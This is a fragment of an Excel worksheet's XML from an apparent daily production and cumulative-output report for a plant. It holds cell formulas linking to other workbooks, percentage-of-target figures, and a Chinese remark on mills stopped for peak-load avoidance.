        <f>G68+'14'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]15'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'14'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]15'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]15'!$Q$77</f>
        <v>1#磨8:00-24:00避峰停机:16小时(避峰)。2#磨14:30-23:15避峰停机:8.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]15'!$D$43+'[15]15'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]15'!$E$43+'[15]15'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'14'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]15'!$H$43+'[15]15'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'14'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]15'!$K$43+'[15]15'!$K$44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'[15]15'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]15'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'14'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]15'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'14'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]15'!$K$45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G71+'14'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'14'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]15'!$Q$80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G72+'14'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'14'!K72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G73+'14'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'14'!K73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G74+'14'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'14'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]15'!$Q$83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G75+'14'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'14'!K75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G76+'14'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'14'!K76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G77+'14'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'14'!K77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G78+'14'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'14'!K78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'[16]15'!$E$7</f>
        <v>482.16</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'14'!H79</f>
        <v>7848.28</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>154976.75</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]15'!$I$7</f>
        <v>451.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'14'!K79</f>
        <v>7534</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>149425.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]15'!$L$7</f>
        <v>5199.06</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.39812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'[16]15'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'14'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]15'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'14'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]15'!$Y$15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G81+'14'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'14'!K81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G82+'14'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'14'!K82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G83+'14'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'14'!K83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G84+'14'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'14'!K84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G85+'14'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'14'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E14"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16/31</f>
        <v>0.516129032258065</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46007</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16679.4</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'15'!H5</f>
        <v>336056.49</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6490922.52</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23162.47</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'15'!K5</f>
        <v>364961.915</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6515033.046</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>238562.399</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>63.7867377005347</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]16'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]16'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]16'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]16'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]16'!$U$101</f>
        <v>60.14765625</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]16'!$V$101</f>
        <v>64.4557857142857</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]16'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]16'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]16'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]16'!$D$23+'[11]16'!$D$17+'[12]16'!$D$17+'[13]16'!$D$25+'[14]16'!$D$8+'[14]16'!$D$15+'[15]16'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]16'!$E$23+'[11]16'!$E$17+'[12]16'!$E$17+'[13]16'!$E$25+'[14]16'!$E$8+'[14]16'!$E$15+'[15]16'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'15'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]16'!$I$23+'[11]16'!$I$17+'[12]16'!$I$17+'[13]16'!$I$25+'[14]16'!$E$23+'[14]16'!$E$30+'[15]16'!$H$7</f>
        <v>623.96</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'15'!K6</f>
        <v>11329.43</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>273527.13</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]16'!$L$23+'[11]16'!$L$17+'[12]16'!$L$17+'[13]16'!$L$25+'[14]16'!$H$23+'[14]16'!$H$30+'[15]16'!$K$7</f>
        <v>26211.41</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]16'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]16'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]16'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]16'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]16'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]16'!$V$102</f>
        <v>33.8714166666667</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]16'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]16'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]16'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]16'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]16'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'15'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]16'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'15'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]16'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]16'!$W$107</f>
        <v>133</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]16'!$X$107</f>
        <v>126.216201086044</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]16'!$Y$107</f>
        <v>131.548088256271</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]16'!$T$107</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]16'!$U$107</f>
        <v>46.5182291666667</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]16'!$V$107</f>
        <v>31.7149999999999</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]16'!$Q$107</f>
        <v>10</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]16'!$R$107</f>
        <v>178.63</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]16'!$S$107</f>
        <v>2664.06</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]16'!$D$27+'[11]16'!$D$18+'[13]16'!$D$26+'[14]16'!$D$10+'[14]16'!$D$17+'[15]16'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]16'!$E$27+'[11]16'!$E$18+'[13]16'!$E$26+'[14]16'!$E$10+'[14]16'!$E$17+'[15]16'!$E$9</f>
        <v>2992</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'15'!H8</f>
        <v>37326</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>562862.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]16'!$I$27+'[11]16'!$I$18+'[13]16'!$I$26+'[14]16'!$E$25+'[14]16'!$E$32+'[15]16'!$H$9</f>
        <v>2134.92</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'15'!K8</f>
        <v>39928.63</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>547673.34</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]16'!$L$27+'[11]16'!$L$18+'[13]16'!$L$26+'[14]16'!$H$25+'[14]16'!$H$32+'[15]16'!$K$9</f>
        <v>39277.27</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]16'!$W$108</f>
        <v>119.7</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]16'!$X$108</f>
        <v>131.707182928171</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]16'!$Y$108</f>
        <v>127.751642724716</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]16'!$T$108</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]16'!$U$108</f>
        <v>47.3489583333333</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]16'!$V$108</f>
        <v>28.3175</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]16'!$Q$108</f>
        <v>10</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]16'!$R$108</f>
        <v>181.82</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]16'!$S$108</f>
        <v>2378.67</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]16'!$D$24+'[11]16'!$D$19+'[12]16'!$D$20+'[13]16'!$D$27+'[14]16'!$D$11+'[14]16'!$D$18+'[15]16'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]16'!$E$24+'[11]16'!$E$19+'[12]16'!$E$20+'[13]16'!$E$27+'[14]16'!$E$11+'[14]16'!$E$18+'[15]16'!$E$10</f>
        <v>8085</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'15'!H9</f>
        <v>240413</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4375801.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]16'!$I$24+'[11]16'!$I$19+'[12]16'!$I$20+'[13]16'!$I$27+'[14]16'!$E$26+'[14]16'!$E$33+'[15]16'!$H$10</f>
        <v>15954.34</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'15'!K9</f>
        <v>245919.435</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4343398.246</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]16'!$L$24+'[11]16'!$L$19+'[12]16'!$L$20+'[13]16'!$L$27+'[14]16'!$H$26+'[14]16'!$H$33+'[15]16'!$K$10</f>
        <v>105359.277</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]16'!$W$109</f>
        <v>284.868977176669</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]16'!$X$109</f>
        <v>276.643430689138</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]16'!$Y$109</f>
        <v>271.520701841234</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]16'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]16'!$U$109</f>
        <v>29.5130208333333</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]16'!$V$109</f>
        <v>34.6299999999999</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]16'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]16'!$R$109</f>
        <v>113.33</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]16'!$S$109</f>
        <v>2908.92</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]16'!$D$25+'[11]16'!$D$20+'[12]16'!$D$21+'[13]16'!$D$28+'[14]16'!$D$12+'[14]16'!$D$19+'[15]16'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]16'!$E$25+'[11]16'!$E$20+'[12]16'!$E$21+'[13]16'!$E$28+'[14]16'!$E$12+'[14]16'!$E$19+'[15]16'!$E$11</f>
        <v>4727</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'15'!H10</f>
        <v>35466</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>952993.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]16'!$I$25+'[11]16'!$I$20+'[12]16'!$I$21+'[13]16'!$I$28+'[14]16'!$E$27+'[14]16'!$E$34+'[15]16'!$H$11</f>
        <v>2931.66</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'15'!K10</f>
        <v>46103.04</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>943331.76</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]16'!$L$25+'[11]16'!$L$20+'[12]16'!$L$21+'[13]16'!$L$28+'[14]16'!$H$27+'[14]16'!$H$34+'[15]16'!$K$11</f>
        <v>50569.902</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]16'!$W$110</f>
        <v>263.891577928364</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]16'!$X$110</f>
        <v>258.766917293233</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]16'!$Y$110</f>
        <v>268.387951923675</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]16'!$T$110</f>
        <v>43.0416666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]16'!$U$110</f>
        <v>34.6354166666667</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]16'!$V$110</f>
        <v>34.4888095238095</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]16'!$Q$110</f>
        <v>10.33</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]16'!$R$110</f>
        <v>133</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]16'!$S$110</f>
        <v>2897.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]16'!$D$26+'[11]16'!$D$21+'[12]16'!$D$19+'[13]16'!$D$29+'[14]16'!$D$13+'[14]16'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]16'!$E$26+'[11]16'!$E$21+'[12]16'!$E$19+'[13]16'!$E$29+'[14]16'!$E$13+'[14]16'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'15'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]16'!$I$26+'[11]16'!$I$21+'[12]16'!$I$19+'[13]16'!$I$29+'[14]16'!$E$28+'[14]16'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'15'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]16'!$L$26+'[11]16'!$L$21+'[12]16'!$L$19+'[13]16'!$L$29+'[14]16'!$H$28+'[14]16'!$H$35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6259.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'15'!H12</f>
        <v>141110.86</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5083502.11</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>13682.3</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'15'!K12</f>
        <v>275363.133</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5304469.509</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>273706.69200005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>62.3477658314466</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]16'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]16'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]16'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]16'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]16'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]16'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]16'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]16'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]16'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'15'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'15'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>50.221411376156</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]16'!$W$68</f>
        <v>260.791666666667</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]16'!$X$68</f>
        <v>261.96644295302</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]16'!$Y$68</f>
        <v>266.164086364036</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]16'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]16'!$U$68</f>
        <v>77.6041666666667</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]16'!$V$68</f>
        <v>71.8277380952381</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]16'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]16'!$R$68</f>
        <v>298.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]16'!$S$68</f>
        <v>6033.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>4355</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'15'!H14</f>
        <v>42947</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1007490.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5771.18</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'15'!K14</f>
        <v>87650.065</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1880594.171</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>60936.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]16'!$W$71</f>
        <v>218.72197309417</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]16'!$X$71</f>
        <v>217.807407407407</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]16'!$Y$71</f>
        <v>213.706727358714</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]16'!$T$71</f>
        <v>37.1666666666667</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]16'!$U$71</f>
        <v>52.734375</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]16'!$V$71</f>
        <v>50.3452380952381</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]16'!$Q$71</f>
        <v>8.92</v>
